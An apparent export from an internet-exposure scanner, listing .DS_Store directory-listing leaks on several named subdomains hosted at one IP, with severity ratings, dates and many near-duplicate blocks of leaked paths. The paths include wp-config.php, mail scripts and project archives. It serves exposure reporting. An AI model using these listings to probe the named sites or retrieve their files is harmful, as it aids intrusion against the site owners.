Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-07-08 12:36
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2023-02-22 18:29
Last seen 2024-07-08 10:49
Open for 501 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-07-08 10:49
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2023-02-22 18:29
Last seen 2024-07-08 10:49
Open for 501 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-07-08 10:49
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2023-02-22 18:29
Last seen 2024-07-08 09:56
Open for 501 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-07-08 09:56
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-21 18:23
Last seen 2024-07-08 02:03
Open for 625 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-07-08 02:03
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: dinhome.papaconstantinou.com
Port: 443
URL: https://dinhome.papaconstantinou.comFirst seen 2022-10-21 18:03
Last seen 2024-06-21 04:17
Open for 608 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09c70ba7b5770ba7b579a2bc1b00143b801d239c02f7e971367Found 54 files trough .DS_Store spidering: /_notes /images /images/company_images /images/images /index.html /Sunny Corn Temp /Sunny Corn Temp/images /sunny_corn /Wood_furniture_restoration_&_refurbishing /Wood_furniture_restoration_&_refurbishing/AC_RunActiveContent.js /Wood_furniture_restoration_&_refurbishing/Back-ground-Din-Home.gif /Wood_furniture_restoration_&_refurbishing/Buy_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Choice-of-stains.gif /Wood_furniture_restoration_&_refurbishing/DIN-Home-Web-Hosting-Limited-Time-Offer.gif /Wood_furniture_restoration_&_refurbishing/DIN-HOME_Coffee_Table_Images.html /Wood_furniture_restoration_&_refurbishing/DIN.docx /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 0.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 01.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 1.jpg /Wood_furniture_restoration_&_refurbishing/DINHOME-Logo.jpg /Wood_furniture_restoration_&_refurbishing/dinhome.jpg /Wood_furniture_restoration_&_refurbishing/ECO Bench Ottoman 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 1.9 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table Images.swf /Wood_furniture_restoration_&_refurbishing/Eco Friendly Table.jpg /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4.gif /Wood_furniture_restoration_&_refurbishing/Eco-Coffee-Table--Birch-Finish.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4.gif /Wood_furniture_restoration_&_refurbishing/favicon.ico /Wood_furniture_restoration_&_refurbishing/index.css /Wood_furniture_restoration_&_refurbishing/index.html /Wood_furniture_restoration_&_refurbishing/Natural-Finish.gif /Wood_furniture_restoration_&_refurbishing/Natural_ECO_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Pricing /Wood_furniture_restoration_&_refurbishing/Produits_Maison_DIN_Home_Products_Contact.html /Wood_furniture_restoration_&_refurbishing/Register and Start Selling /Wood_furniture_restoration_&_refurbishing/Scripts /Wood_furniture_restoration_&_refurbishing/sitemap.xml /Wood_furniture_restoration_&_refurbishing/SpryAssets /Wood_furniture_restoration_&_refurbishing/Stain_Color_for_Eco_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Stained Finishing.psd /Wood_furniture_restoration_&_refurbishing/Stained-Finishing.gif /Wood_furniture_restoration_&_refurbishing/Stained_&_Varnished_Coffee Table.html /Wood_furniture_restoration_&_refurbishing/Tables Home Products and web hosting.jpg /Wood_furniture_restoration_&_refurbishing/Varnished-Birch-Coffee-Table-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished_ECO_Coffee_Table.html
Found on 2024-06-21 04:17 -
Severity: medium
Fingerprint: 5f32cf5d6962f09cecc85b04ecc85b04e86d46ed2be25d86f5667ee88f3bbac5Found 53 files trough .DS_Store spidering: /_notes /images /images/company_images /images/images /index.html /Sunny Corn /Sunny Corn/images /Wood_furniture_restoration_&_refurbishing /Wood_furniture_restoration_&_refurbishing/AC_RunActiveContent.js /Wood_furniture_restoration_&_refurbishing/Back-ground-Din-Home.gif /Wood_furniture_restoration_&_refurbishing/Buy_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Choice-of-stains.gif /Wood_furniture_restoration_&_refurbishing/DIN-Home-Web-Hosting-Limited-Time-Offer.gif /Wood_furniture_restoration_&_refurbishing/DIN-HOME_Coffee_Table_Images.html /Wood_furniture_restoration_&_refurbishing/DIN.docx /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 0.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 01.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 1.jpg /Wood_furniture_restoration_&_refurbishing/DINHOME-Logo.jpg /Wood_furniture_restoration_&_refurbishing/dinhome.jpg /Wood_furniture_restoration_&_refurbishing/ECO Bench Ottoman 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 1.9 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table Images.swf /Wood_furniture_restoration_&_refurbishing/Eco Friendly Table.jpg /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4.gif /Wood_furniture_restoration_&_refurbishing/Eco-Coffee-Table--Birch-Finish.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4.gif /Wood_furniture_restoration_&_refurbishing/favicon.ico /Wood_furniture_restoration_&_refurbishing/index.css /Wood_furniture_restoration_&_refurbishing/index.html /Wood_furniture_restoration_&_refurbishing/Natural-Finish.gif /Wood_furniture_restoration_&_refurbishing/Natural_ECO_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Pricing /Wood_furniture_restoration_&_refurbishing/Produits_Maison_DIN_Home_Products_Contact.html /Wood_furniture_restoration_&_refurbishing/Register and Start Selling /Wood_furniture_restoration_&_refurbishing/Scripts /Wood_furniture_restoration_&_refurbishing/sitemap.xml /Wood_furniture_restoration_&_refurbishing/SpryAssets /Wood_furniture_restoration_&_refurbishing/Stain_Color_for_Eco_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Stained Finishing.psd /Wood_furniture_restoration_&_refurbishing/Stained-Finishing.gif /Wood_furniture_restoration_&_refurbishing/Stained_&_Varnished_Coffee Table.html /Wood_furniture_restoration_&_refurbishing/Tables Home Products and web hosting.jpg /Wood_furniture_restoration_&_refurbishing/Varnished-Birch-Coffee-Table-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished_ECO_Coffee_Table.html
Found on 2023-05-03 18:08 -
Severity: low
Fingerprint: 5f32cf5d6962f09c1a5d9b0f1a5d9b0f661bc6c861963df20051ecb80051ecb8Found 3 files trough .DS_Store spidering: /images /images/company_images /index.html
Found on 2022-10-21 18:03
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.cuir-panda-leather-ca.papaconstantinou.com
Port: 443
URL: https://www.cuir-panda-leather-ca.papaconstantinou.comFirst seen 2023-03-02 18:55
Last seen 2024-06-21 02:30
Open for 476 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3af247253af24725f3770dac72d6be8680cd2528b6a63b98Found 9 files trough .DS_Store spidering: /Business Card Panda /cgi-bin /Francais /Francais/images /Francais/Photoshop /Francais/SpryAssets /images /Photoshop /SpryAssets
Found on 2024-06-21 02:30
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.dinhome-ca.papaconstantinou.com
Port: 443
URL: https://www.dinhome-ca.papaconstantinou.comFirst seen 2022-10-20 18:18
Last seen 2024-06-20 18:45
Open for 609 days-
Severity: high
Fingerprint: 5f32cf5d6962f09c778888b4778888b43443393d58fc2c8742783f2be340ec03Found 40 files trough .DS_Store spidering: /admin-ajax.php /after_disaster_relief.css /after_disaster_relief.html /all_dropdown.css /commercial_dinhome_home.css /commercial_renovations.css /commercial_renovations.html /constrcution_worker_jobs_employment.css /constrcution_worker_jobs_employment.html /demolition.css /demolition.html /demolition_frame2.png /dinhome_contact.html /dinhome_home.css /dinhome_home_projects.css /favicon-16x16.png /favicon-32x32.png /home_renovations.css /home_renovations.html /images /images/logo-DinHome-Design.png /index.html /interior_design.css /interior_design.html /job /main.css /new_construction.css /new_construction.html /NK2502_Topo_anglais_2020-02-07_Land_Serveyor.dwg /privacy_statement_of_dinhome_design.html /privacy_statement_of_dinhome_design_main.css /project_management.css /project_management.html /projects_progress_folders /projects_progress_folders.zip /Rapport étude de sol lot SOIL SAMPLES # 1 557 039.PDF /respond.min.js /SpryAssets /structural_modifications.css /structural_modifications.html
Found on 2024-06-20 18:45
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.maisondin-ca.papaconstantinou.com
Port: 443
URL: https://www.maisondin-ca.papaconstantinou.comFirst seen 2022-10-20 18:18
Last seen 2024-06-20 15:26
Open for 608 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c2eda814e2eda814efa4e382f4ba6ab874f3a0e468067f85fFound 6 files trough .DS_Store spidering: /_notes /Din-Home_marketing_consultants /Din-Home_marketing_consultants/Photoshop /Din-Home_marketing_consultants/SpryAssets /images /SpryAssets
Found on 2024-06-20 15:26 -
Severity: low
Fingerprint: 5f32cf5d6962f09c0215adfc0215adfce4d72915b274b63d6174b2563dd5bbbcFound 4 files trough .DS_Store spidering: /_notes /Din-Home_marketing_consultants /images /SpryAssets
Found on 2022-10-20 18:18
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.dinhome.papaconstantinou.com
Port: 443
URL: https://www.dinhome.papaconstantinou.comFirst seen 2022-10-21 18:03
Last seen 2024-06-20 13:03
Open for 607 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09c70ba7b5770ba7b579a2bc1b00143b801d239c02f7e971367Found 54 files trough .DS_Store spidering: /_notes /images /images/company_images /images/images /index.html /Sunny Corn Temp /Sunny Corn Temp/images /sunny_corn /Wood_furniture_restoration_&_refurbishing /Wood_furniture_restoration_&_refurbishing/AC_RunActiveContent.js /Wood_furniture_restoration_&_refurbishing/Back-ground-Din-Home.gif /Wood_furniture_restoration_&_refurbishing/Buy_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Choice-of-stains.gif /Wood_furniture_restoration_&_refurbishing/DIN-Home-Web-Hosting-Limited-Time-Offer.gif /Wood_furniture_restoration_&_refurbishing/DIN-HOME_Coffee_Table_Images.html /Wood_furniture_restoration_&_refurbishing/DIN.docx /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 0.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 01.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 1.jpg /Wood_furniture_restoration_&_refurbishing/DINHOME-Logo.jpg /Wood_furniture_restoration_&_refurbishing/dinhome.jpg /Wood_furniture_restoration_&_refurbishing/ECO Bench Ottoman 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 1.9 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table Images.swf /Wood_furniture_restoration_&_refurbishing/Eco Friendly Table.jpg /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4.gif /Wood_furniture_restoration_&_refurbishing/Eco-Coffee-Table--Birch-Finish.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4.gif /Wood_furniture_restoration_&_refurbishing/favicon.ico /Wood_furniture_restoration_&_refurbishing/index.css /Wood_furniture_restoration_&_refurbishing/index.html /Wood_furniture_restoration_&_refurbishing/Natural-Finish.gif /Wood_furniture_restoration_&_refurbishing/Natural_ECO_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Pricing /Wood_furniture_restoration_&_refurbishing/Produits_Maison_DIN_Home_Products_Contact.html /Wood_furniture_restoration_&_refurbishing/Register and Start Selling /Wood_furniture_restoration_&_refurbishing/Scripts /Wood_furniture_restoration_&_refurbishing/sitemap.xml /Wood_furniture_restoration_&_refurbishing/SpryAssets /Wood_furniture_restoration_&_refurbishing/Stain_Color_for_Eco_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Stained Finishing.psd /Wood_furniture_restoration_&_refurbishing/Stained-Finishing.gif /Wood_furniture_restoration_&_refurbishing/Stained_&_Varnished_Coffee Table.html /Wood_furniture_restoration_&_refurbishing/Tables Home Products and web hosting.jpg /Wood_furniture_restoration_&_refurbishing/Varnished-Birch-Coffee-Table-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished_ECO_Coffee_Table.html
Found on 2024-06-20 13:03 -
Severity: medium
Fingerprint: 5f32cf5d6962f09cecc85b04ecc85b04e86d46ed2be25d86f5667ee88f3bbac5Found 53 files trough .DS_Store spidering: /_notes /images /images/company_images /images/images /index.html /Sunny Corn /Sunny Corn/images /Wood_furniture_restoration_&_refurbishing /Wood_furniture_restoration_&_refurbishing/AC_RunActiveContent.js /Wood_furniture_restoration_&_refurbishing/Back-ground-Din-Home.gif /Wood_furniture_restoration_&_refurbishing/Buy_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Choice-of-stains.gif /Wood_furniture_restoration_&_refurbishing/DIN-Home-Web-Hosting-Limited-Time-Offer.gif /Wood_furniture_restoration_&_refurbishing/DIN-HOME_Coffee_Table_Images.html /Wood_furniture_restoration_&_refurbishing/DIN.docx /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 0.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 01.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 1.jpg /Wood_furniture_restoration_&_refurbishing/DINHOME-Logo.jpg /Wood_furniture_restoration_&_refurbishing/dinhome.jpg /Wood_furniture_restoration_&_refurbishing/ECO Bench Ottoman 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 1.9 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table Images.swf /Wood_furniture_restoration_&_refurbishing/Eco Friendly Table.jpg /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4.gif /Wood_furniture_restoration_&_refurbishing/Eco-Coffee-Table--Birch-Finish.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4.gif /Wood_furniture_restoration_&_refurbishing/favicon.ico /Wood_furniture_restoration_&_refurbishing/index.css /Wood_furniture_restoration_&_refurbishing/index.html /Wood_furniture_restoration_&_refurbishing/Natural-Finish.gif /Wood_furniture_restoration_&_refurbishing/Natural_ECO_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Pricing /Wood_furniture_restoration_&_refurbishing/Produits_Maison_DIN_Home_Products_Contact.html /Wood_furniture_restoration_&_refurbishing/Register and Start Selling /Wood_furniture_restoration_&_refurbishing/Scripts /Wood_furniture_restoration_&_refurbishing/sitemap.xml /Wood_furniture_restoration_&_refurbishing/SpryAssets /Wood_furniture_restoration_&_refurbishing/Stain_Color_for_Eco_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Stained Finishing.psd /Wood_furniture_restoration_&_refurbishing/Stained-Finishing.gif /Wood_furniture_restoration_&_refurbishing/Stained_&_Varnished_Coffee Table.html /Wood_furniture_restoration_&_refurbishing/Tables Home Products and web hosting.jpg /Wood_furniture_restoration_&_refurbishing/Varnished-Birch-Coffee-Table-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished_ECO_Coffee_Table.html
Found on 2023-05-03 18:08 -
Severity: low
Fingerprint: 5f32cf5d6962f09c7cf176427cf17642f59365a3befececfbefececfbefececfFound 2 files trough .DS_Store spidering: /images /index.html
Found on 2022-12-31 18:55 -
Severity: low
Fingerprint: 5f32cf5d6962f09c1a5d9b0f1a5d9b0f661bc6c861963df20051ecb80051ecb8Found 3 files trough .DS_Store spidering: /images /images/company_images /index.html
Found on 2022-10-21 18:03
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: dinhome-ca.papaconstantinou.com
Port: 443
URL: https://dinhome-ca.papaconstantinou.comFirst seen 2022-12-31 18:55
Last seen 2024-06-20 10:20
Open for 536 days-
Severity: high
Fingerprint: 5f32cf5d6962f09c778888b4778888b43443393d58fc2c8742783f2be340ec03Found 40 files trough .DS_Store spidering: /admin-ajax.php /after_disaster_relief.css /after_disaster_relief.html /all_dropdown.css /commercial_dinhome_home.css /commercial_renovations.css /commercial_renovations.html /constrcution_worker_jobs_employment.css /constrcution_worker_jobs_employment.html /demolition.css /demolition.html /demolition_frame2.png /dinhome_contact.html /dinhome_home.css /dinhome_home_projects.css /favicon-16x16.png /favicon-32x32.png /home_renovations.css /home_renovations.html /images /images/logo-DinHome-Design.png /index.html /interior_design.css /interior_design.html /job /main.css /new_construction.css /new_construction.html /NK2502_Topo_anglais_2020-02-07_Land_Serveyor.dwg /privacy_statement_of_dinhome_design.html /privacy_statement_of_dinhome_design_main.css /project_management.css /project_management.html /projects_progress_folders /projects_progress_folders.zip /Rapport étude de sol lot SOIL SAMPLES # 1 557 039.PDF /respond.min.js /SpryAssets /structural_modifications.css /structural_modifications.html
Found on 2024-06-20 10:20
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: omegamedia-ltd.siteplan.co.il
Port: 443
URL: https://omegamedia-ltd.siteplan.co.ilFirst seen 2022-08-28 17:39
Last seen 2024-06-18 19:41
Open for 660 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09cccd847a3ccd847a38aa96330a09b19a066549274f167ddd3Found 43 files trough .DS_Store spidering: /0.php /assets /class-phpmailer.php /class-smtp.php /css /dist /favicon /favicon/android-icon-144x144.png /favicon/android-icon-192x192.png /favicon/android-icon-36x36.png /favicon/android-icon-48x48.png /favicon/android-icon-72x72.png /favicon/android-icon-96x96.png /favicon/apple-icon-114x114.png /favicon/apple-icon-120x120.png /favicon/apple-icon-144x144.png /favicon/apple-icon-152x152.png /favicon/apple-icon-180x180.png /favicon/apple-icon-57x57.png /favicon/apple-icon-60x60.png /favicon/apple-icon-72x72.png /favicon/apple-icon-76x76.png /favicon/apple-icon-precomposed.png /favicon/apple-icon.png /favicon/browserconfig.xml /favicon/favicon-16x16.png /favicon/favicon-32x32.png /favicon/favicon-96x96.png /favicon/favicon.ico /favicon/manifest.json /favicon/ms-icon-144x144.png /favicon/ms-icon-150x150.png /favicon/ms-icon-310x310.png /favicon/ms-icon-70x70.png /images /img /index.php /js /mail.php /mix-manifest.json /og.png /robots.txt /web.config
Found on 2024-06-18 19:41
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.soins-domicile-etre.papaconstantinou.com
Port: 443
URL: https://www.soins-domicile-etre.papaconstantinou.comFirst seen 2022-12-31 18:53
Last seen 2024-06-18 19:35
Open for 535 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c1a5d9b0f1a5d9b0f661bc6c8d227515449534bff49534bffFound 3 files trough .DS_Store spidering: /images /imprimer /profil_de_la_société.html
Found on 2024-06-18 19:35
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: one-lights-ca.papaconstantinou.com
Port: 443
URL: https://one-lights-ca.papaconstantinou.comFirst seen 2022-10-20 18:18
Last seen 2024-06-18 18:59
Open for 607 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c7cf176427cf17642f59365a3875f972d875f972d875f972dFound 2 files trough .DS_Store spidering: /images /images/Kickstarter_pre_order
Found on 2024-06-18 18:59
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.one-lights-ca.papaconstantinou.com
Port: 443
URL: https://www.one-lights-ca.papaconstantinou.comFirst seen 2022-12-31 18:54
Last seen 2024-06-18 17:13
Open for 534 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c7cf176427cf17642f59365a3875f972d875f972d875f972dFound 2 files trough .DS_Store spidering: /images /images/Kickstarter_pre_order
Found on 2024-06-18 17:13
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: soins-domicile-etre.papaconstantinou.com
Port: 443
URL: https://soins-domicile-etre.papaconstantinou.comFirst seen 2022-10-19 17:59
Last seen 2024-06-18 15:04
Open for 607 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c1a5d9b0f1a5d9b0f661bc6c8d227515449534bff49534bffFound 3 files trough .DS_Store spidering: /images /imprimer /profil_de_la_société.html
Found on 2024-06-18 15:04
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: cuir-panda-leather-ca.papaconstantinou.com
Port: 443
URL: https://cuir-panda-leather-ca.papaconstantinou.comFirst seen 2022-12-31 18:54
Last seen 2024-06-18 12:31
Open for 534 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3af247253af24725f3770dac72d6be8680cd2528b6a63b98Found 9 files trough .DS_Store spidering: /Business Card Panda /cgi-bin /Francais /Francais/images /Francais/Photoshop /Francais/SpryAssets /images /Photoshop /SpryAssets
Found on 2024-06-18 12:31 -
Severity: low
Fingerprint: 5f32cf5d6962f09c2eda814e2eda814e2e65bb97b363c985b81f17d9d482e563Found 6 files trough .DS_Store spidering: /Business Card Panda /cgi-bin /Francais /images /Photoshop /SpryAssets
Found on 2022-12-31 18:54
-
-
MacOS file listing through .DS_Store file
